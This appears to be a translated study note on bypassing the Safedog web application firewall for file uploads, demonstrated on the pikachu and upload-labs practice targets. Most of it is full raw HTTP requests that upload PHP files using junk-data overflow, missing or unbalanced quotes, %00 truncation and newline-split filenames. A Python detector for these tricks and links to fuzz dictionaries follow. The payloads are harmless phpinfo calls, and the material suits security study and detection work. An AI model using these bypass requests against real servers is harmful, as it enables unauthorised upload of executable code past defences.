Upload WAF bypass
Upload parameter parsing: which parts can be modified?
Content-Disposition: generally modifiable
name: form parameter value, cannot be changed
filename: the file name, can be changed
Content-Type: the file's MIME type, change it depending on the situation
Common bypass methods
Data overflow to defeat matching (xxx.. .)
Symbol mutation to defeat matching (' " ;)
Data truncation to defeat matching (%00 ; newline)
Duplicate data to defeat matching (parameter repeated several times)
pikachu + Safedog bypass
https://www.cnblogs.com/shley/p/14800623.html
Data overflow
The normal upload case
The case blocked by Safedog
Modify the request packet: insert a large amount of junk data into the middle of Content-Disposition: form-data; name="uploadfile"; to get past the check.
%00 truncation
Use %00 truncation and append a legitimate extension: filename.php%00.png
Changing symbols
Remove the double quotes
POST /vul/unsafeupload/servercheck.php HTTP/1.1
Host: 10.1.1.6:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------276594773132894662704244861418
Content-Length: 367
Origin: http://10.1.1.6:88
Connection: close
Referer: http://10.1.1.6:88/vul/unsafeupload/servercheck.php
Cookie: PHPSESSID=e405r8e634hhjk7su64ofmjknl
Upgrade-Insecure-Requests: 1
-----------------------------276594773132894662704244861418
Content-Disposition: form-data;name="uploadfile"; filename=info4.php
Content-Type: image/jpeg
<?php phpinfo(); ?>
-----------------------------276594773132894662704244861418
Content-Disposition: form-data; name="submit"
开始上传
-----------------------------276594773132894662704244861418--
Using only one double quote, the file info5.php is uploaded successfully
POST /vul/unsafeupload/servercheck.php HTTP/1.1
Host: 10.1.1.6:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------276594773132894662704244861418
Content-Length: 368
Origin: http://10.1.1.6:88
Connection: close
Referer: http://10.1.1.6:88/vul/unsafeupload/servercheck.php
Cookie: PHPSESSID=e405r8e634hhjk7su64ofmjknl
Upgrade-Insecure-Requests: 1
-----------------------------276594773132894662704244861418
Content-Disposition: form-data;name="uploadfile"; filename="info5.php
Content-Type: image/jpeg
<?php phpinfo(); ?>
-----------------------------276594773132894662704244861418
Content-Disposition: form-data; name="submit"
开始上传
-----------------------------276594773132894662704244861418--
uploads + Safedog bypass
Data overflow
POST /Pass-06/index.php?action=show_code HTTP/1.1
Host: 10.1.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------219208409912899756444268510117
Content-Length: 378
Origin: http://10.1.1.6
Connection: close
Referer: http://10.1.1.6/Pass-06/index.php?action=show_code
Upgrade-Insecure-Requests: 1
-----------------------------219208409912899756444268510117
Content-Disposition: form-data; name="upload_file";[a large amount of junk data padded here]; filename="info.Php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
-----------------------------219208409912899756444268510117
Content-Disposition: form-data; name="submit"
上传
-----------------------------219208409912899756444268510117--
Changing symbols
POST /Pass-02/index.php?action=show_code HTTP/1.1
Host: 10.1.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------156187617541967037312717027348
Content-Length: 363
Origin: http://10.1.1.6
Connection: close
Referer: http://10.1.1.6/Pass-02/index.php?action=show_code
Upgrade-Insecure-Requests: 1
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="upload_file"; filename="info.php
Content-Type: image/jpeg
<?php phpinfo(); ?>
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="submit"
上传
-----------------------------156187617541967037312717027348--
POST /Pass-02/index.php?action=show_code HTTP/1.1
Host: 10.1.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------156187617541967037312717027348
Content-Length: 362
Origin: http://10.1.1.6
Connection: close
Referer: http://10.1.1.6/Pass-02/index.php?action=show_code
Upgrade-Insecure-Requests: 1
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="upload_file"; filename=info.php
Content-Type: image/jpeg
<?php phpinfo(); ?>
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="submit"
上传
-----------------------------156187617541967037312717027348--
%00 truncation
POST /Pass-02/index.php?action=show_code HTTP/1.1
Host: 10.1.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------156187617541967037312717027348
Content-Length: 371
Origin: http://10.1.1.6
Connection: close
Referer: http://10.1.1.6/Pass-02/index.php?action=show_code
Upgrade-Insecure-Requests: 1
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="upload_file"; filename="info.php%00.png"
Content-Type: image/jpeg
<?php phpinfo(); ?>
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="submit"
上传
-----------------------------156187617541967037312717027348--
Newline execution (filename split across lines)
POST /Pass-02/index.php?action=show_code HTTP/1.1
Host: 10.1.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------156187617541967037312717027348
Content-Length: 368
Origin: http://10.1.1.6
Connection: close
Referer: http://10.1.1.6/Pass-02/index.php?action=show_code
Upgrade-Insecure-Requests: 1
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="upload_file"; filename="x.
p
h
p"
Content-Type: image/jpeg
<?php phpinfo(); ?>
-----------------------------156187617541967037312717027348
Content-Disposition: form-data; name="submit"
上传
-----------------------------156187617541967037312717027348--
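The captures above all exploit one gap: the WAF matches the raw header text while the backend normalizes it first. As an added example (not from the original notes or any WAF product), the following Python shows the defender's side: it parses a part's Content-Disposition as leniently as the captures show the backend doing (rejoining split lines, accepting half-quoted and bare filenames, ignoring case), then reports the evasion indicators this page lists. MAX_DISPOSITION_LEN and SAMPLE_PART are assumptions constructed for the example.

```python
import re

MAX_DISPOSITION_LEN = 256   # assumed WAF policy limit; tune per deployment
EXEC_EXTS = {b"php", b"php3", b"php5", b"phtml", b"phar"}

def lenient_headers(head: bytes) -> dict:
    """Parse a part's headers the lenient way the page's captures show the backend
    doing it: a line without ':' is appended to the previous header's value."""
    headers, last = {}, None
    for line in head.split(b"\r\n"):
        if b":" in line and not line[:1].isspace():
            last, value = line.split(b":", 1)
            last = last.strip().lower()
            headers[last] = value.strip()
        elif last is not None:
            headers[last] += line          # rejoins "x.\r\np\r\nh\r\np" into x.php
    return headers

def lenient_filename(disp: bytes):
    """Accept filename="a", the half-quoted filename="a and the bare filename=a."""
    m = re.search(rb'filename\s*=\s*(?:"([^"]*)"?|([^\s;]*))', disp, re.I)
    return None if not m else (m.group(1) if m.group(1) is not None else m.group(2))

def inspect_part(part: bytes) -> dict:
    """Return the effective filename plus the evasion indicators seen in one part."""
    head = part.partition(b"\r\n\r\n")[0]
    disp = lenient_headers(head).get(b"content-disposition", b"")
    name, findings = lenient_filename(disp), []
    if len(disp) > MAX_DISPOSITION_LEN:
        findings.append("oversized-disposition")
    if any(ln and b":" not in ln for ln in head.split(b"\r\n")):
        findings.append("continuation-line")
    if name is not None:
        if not re.search(rb'filename\s*=\s*"[^"]*"', disp, re.I):
            findings.append("unbalanced-quotes")
        if len(re.findall(rb"filename\s*=", disp, re.I)) > 1:
            findings.append("duplicate-filename")
        if b"\x00" in name or b"%00" in name:
            findings.append("null-byte")
        # Judge the extension the backend acts on: text before any null byte,
        # compared case-insensitively (info.Php), on the rejoined name.
        effective = re.split(rb"\x00|%00", name)[0]
        if effective.rsplit(b".", 1)[-1].lower() in EXEC_EXTS:
            findings.append("executable-extension")
    return {"filename": name, "findings": findings}

# Constructed sample part, modelled on the page's newline-split capture.
SAMPLE_PART = (b'Content-Disposition: form-data; name="upload_file"; filename="x.\r\n'
               b'p\r\nh\r\np"\r\nContent-Type: image/jpeg\r\n\r\n<?php phpinfo(); ?>')
```

The point is that the extension decision is made on the normalized name, so a rule that only regex-matches `filename="...\.php"` against the raw line is not what blocks the upload.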
Fuzz dictionaries
https://github.com/fuzzdbproject/fuzzdb
https://github.com/TheKingOfDuck/fuzzDicts
https://github.com/TuuuNya/fuzz_dict
https://github.com/jas502n/fuzz-wooyun-org